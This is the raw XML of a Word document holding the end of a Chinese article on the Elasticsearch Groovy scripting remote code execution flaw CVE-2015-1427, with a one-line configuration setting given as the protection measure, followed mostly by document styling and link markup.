          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>使用默认的动态脚本配置便可被利用，攻击者可以利用这个漏洞</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>getshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="666666"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>防护方案</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0" w:line="360" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>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关闭groovy</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>沙盒以</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>停止动态脚本的使用：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D96492" w:rsidRPr="00D96492" w:rsidRDefault="00D96492" w:rsidP="00D96492">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="crayon-v"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="272822"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="crayon-sy"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="272822"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="crayon-v"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="272822"/>
        </w:rPr>
        <w:t>groovy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="crayon-sy"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="272822"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="crayon-v"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="272822"/>
        </w:rPr>
        <w:t>sandbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="crayon-sy"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="272822"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="crayon-v"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="272822"/>
        </w:rPr>
        <w:t>enabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="crayon-o"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="F8F8F2"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="272822"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="crayon-h"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="272822"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="crayon-t"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="272822"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D96492" w:rsidRPr="00D96492" w:rsidSect="00B07B2B">
      <w:headerReference w:type="even" r:id="rId17"/>
      <w:headerReference w:type="default" r:id="rId18"/>
      <w:footerReference w:type="even" r:id="rId19"/>
      <w:footerReference w:type="default" r:id="rId20"/>
      <w:headerReference w:type="first" r:id="rId21"/>
      <w:footerReference w:type="first" r:id="rId22"/>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C1B" w:rsidRDefault="00FE5C1B" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00FE5C1B" w:rsidRDefault="00FE5C1B"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D96492">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>4</w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:lang w:val="zh-CN"/>
      </w:rPr>
      <w:t xml:space="preserve">/ </w:t>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidR="00790BA7">
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00D96492">
      <w:rPr>
        <w:b/>
        <w:noProof/>
      </w:rPr>
      <w:t>4</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C1B" w:rsidRDefault="00FE5C1B" w:rsidP="006C237E">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00FE5C1B" w:rsidRDefault="00FE5C1B"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D9649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D96492"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D9649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75EDE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7144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5048E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC14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546B43"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="775C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D02D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="86A87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5C1B"/>
    <w:rsid w:val="00026BCE"/>
    <w:rsid w:val="00044C81"/>
    <w:rsid w:val="00067A2E"/>
    <w:rsid w:val="000A2612"/>
    <w:rsid w:val="000A57EB"/>
    <w:rsid w:val="000D26B6"/>
    <w:rsid w:val="001256E1"/>
    <w:rsid w:val="00132A14"/>
    <w:rsid w:val="001A657E"/>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66129"/>
    <w:rsid w:val="00D96492"/>
    <w:rsid w:val="00E35061"/>
    <w:rsid w:val="00E413A6"/>
    <w:rsid w:val="00E47828"/>
    <w:rsid w:val="00E86707"/>
    <w:rsid w:val="00E87BF5"/>
    <w:rsid w:val="00E924F7"/>
    <w:rsid w:val="00EA12FD"/>
    <w:rsid w:val="00EB409A"/>
    <w:rsid w:val="00EC5F7C"/>
    <w:rsid w:val="00EF2F93"/>
    <w:rsid w:val="00F2316B"/>
    <w:rsid w:val="00F31DD5"/>
    <w:rsid w:val="00F552D7"/>
    <w:rsid w:val="00F66A55"/>
    <w:rsid w:val="00F7226B"/>
    <w:rsid w:val="00F94971"/>
    <w:rsid w:val="00FA41C6"/>
    <w:rsid w:val="00FE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DBD0A997-CA2F-499D-B8EE-B336A492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paragraph" w:styleId="3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00E86707"/>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E86707"/>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3Char">
    <w:name w:val="标题 3 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E86707"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
    <w:name w:val="标题 4 Char"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E86707"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ez-toc-title">
    <w:name w:val="ez-toc-title"/>
    <w:basedOn w:val="a"/>
    <w:rsid w:val="00E8670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E86707"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ez-toc-section">
    <w:name w:val="ez-toc-section"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E86707"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-converted-space">
    <w:name w:val="apple-converted-space"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E86707"/>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00E86707"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="aa">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E86707"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-sy">
    <w:name w:val="crayon-sy"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E86707"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-s">
    <w:name w:val="crayon-s"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E86707"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-o">
    <w:name w:val="crayon-o"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E86707"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-h">
    <w:name w:val="crayon-h"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E86707"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-v">
    <w:name w:val="crayon-v"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E86707"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-e">
    <w:name w:val="crayon-e"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E86707"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-cn">
    <w:name w:val="crayon-cn"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E86707"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-i">
    <w:name w:val="crayon-i"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E86707"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="crayon-t">
    <w:name w:val="crayon-t"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00E8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00327">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="707997838">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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992247">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>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076916">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1232351625">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="240"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="8" w:color="AAAAAA"/>
            <w:left w:val="single" w:sz="6" w:space="8" w:color="AAAAAA"/>
            <w:bottom w:val="single" w:sz="6" w:space="8" w:color="AAAAAA"/>
            <w:right w:val="single" w:sz="6" w:space="8" w:color="AAAAAA"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="345715180">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="591163330">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1146358892">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="245192213">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1531142787">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1380475183">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="358356414">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1866360987">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="535657328">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="8" w:color="auto"/>
            <w:left w:val="single" w:sz="36" w:space="15" w:color="EEEEEE"/>
            <w:bottom w:val="none" w:sz="0" w:space="8" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="15" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1905221164">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="180"/>
          <w:marBottom w:val="180"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1601911793">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="93408285">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20832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sfocus.net/elasticsearch-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90%ef%bc%88cve-2015-1427%ef%bc%89%e9%ab%98%e7%ba%a7%e5%88%a9%e7%94%a8%e6%96%b9%e6%b3%95/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.nsfocus.net/elasticsearch-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90%ef%bc%88cve-2015-1427%ef%bc%89%e9%ab%98%e7%ba%a7%e5%88%a9%e7%94%a8%e6%96%b9%e6%b3%9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blog.nsfocus.net/elasticsearch-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90%ef%bc%88cve-2015-1427%ef%bc%89%e9%ab%98%e7%ba%a7%e5%88%a9%e7%94%a8%e6%96%b9%e6%b3%9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rops.wooyun.org/tips/249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nsfocus.net/elasticsearch-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90%ef%bc%88cve-2015-1427%ef%bc%89%e9%ab%98%e7%ba%a7%e5%88%a9%e7%94%a8%e6%96%b9%e6%b3%9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nsfocus.net/tag/php/" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.nsfocus.net/elasticsearch-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90%ef%bc%88cve-2015-1427%ef%bc%89%e9%ab%98%e7%ba%a7%e5%88%a9%e7%94%a8%e6%96%b9%e6%b3%9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nsfocus.net/elasticsearch-%e8%bf%9c%e7%a8%8b%e4%bb%a3%e7%a0%81%e6%89%a7%e8%a1%8c%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90%ef%bc%88cve-2015-1427%ef%bc%89%e9%ab%98%e7%ba%a7%e5%88%a9%e7%94%a8%e6%96%b9%e6%b3%95/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.elasticsearch.org/guide/en/elasticsearch/reference/current/modules-scripting.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66E98-9879-4BD7-AA00-F27D1F637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2016-12-06T16:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-06T16:39:00Z</dcterms:modified>
</cp:coreProperties>
</file>